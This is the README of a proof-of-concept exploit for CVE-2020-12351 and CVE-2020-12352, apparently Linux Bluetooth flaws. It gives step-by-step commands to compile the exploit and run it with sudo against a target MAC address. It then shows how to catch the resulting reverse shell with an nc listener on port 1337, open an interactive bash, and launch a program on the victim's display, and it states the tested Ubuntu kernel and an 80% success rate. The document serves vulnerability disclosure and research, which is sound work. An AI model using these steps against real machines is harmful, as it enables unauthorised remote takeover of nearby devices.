This Proof-Of-Concept demonstrates the exploitation of CVE-2020-12351 and CVE-2020-12352.
Technical details about the exploit is available at writeup.md.
Compile it using:
$ gcc -o exploit exploit.c -lbluetoothand execute it as:
$ sudo ./exploit target_mac source_ip source_portIn another terminal, run:
$ nc -lvp 1337
exec bash -i 2>&0 1>&0If successful, a calc can be spawned with:
export XAUTHORITY=/run/user/1000/gdm/Xauthority
export DISPLAY=:0
gnome-calculatorThis Proof-Of-Concept has been tested against a Dell XPS 15 running Ubuntu 20.04.1 LTS with:
5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
The success rate of the exploit is estimated at 80%.
Andy Nguyen (theflow@)